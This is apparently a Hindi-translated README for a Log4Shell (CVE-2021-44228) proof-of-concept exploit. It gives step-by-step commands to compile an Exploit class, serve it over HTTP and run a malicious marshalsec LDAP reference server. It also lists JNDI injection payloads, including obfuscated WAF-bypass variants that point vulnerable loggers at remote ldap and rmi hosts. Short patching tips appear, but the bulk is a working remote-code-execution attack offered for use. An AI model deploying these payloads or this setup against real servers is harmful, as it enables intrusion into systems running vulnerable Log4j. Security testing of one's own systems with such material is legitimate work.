
CVE-2021-44228 (Log4Shell) के लिए अवधारणा-सिद्ध शोषण जिसमें JNDI इंजेक्शन पेलोड, WAF बाईपास तकनीक, और Burp Suite के लिए निष्क्रिय स्कैनिंग एकीकरण शामिल है।
1.x के संस्करण में अन्य कमजोरियाँ हैं, हम अनुशंसा करते हैं कि आप नवीनतम संस्करण में अपडेट करें।
सुरक्षा सलाहकार / बुलेटिन Log4Shell (CVE-2021-44228) से जुड़े
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
अंत में प्रोजेक्ट चलाएँ, आप अपने स्थानीय से कैलकुलेटर देखेंगे।
Tips:
वर्तमान Java संस्करण पर भरोसा न करें कि वह आपको बचाएगा। Log4j को अपडेट करें (या JNDI lookup हटाएँ)। विस्तार को अक्षम करें (वैसे भी यह काफी बुरा विचार लगता है)।
उदाहरण के लिए:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
वेब एप्लिकेशन फ़ायरवॉल पर भरोसा न करें।
Lookups Log4j कॉन्फ़िगरेशन में मनमाने स्थानों पर मान जोड़ने का एक तरीका प्रदान करते हैं।
अंत में लीक का कारण बनने के तरीके
LogManager.getLogger().error()
LogManager.getLogger().fatal()
यदि आप ब्लैक-बॉक्स परीक्षण करना चाहते हैं, मैं सुझाव देता हूँ कि आप निष्क्रिय स्कैनिंग करें।
मज़े करें!!!
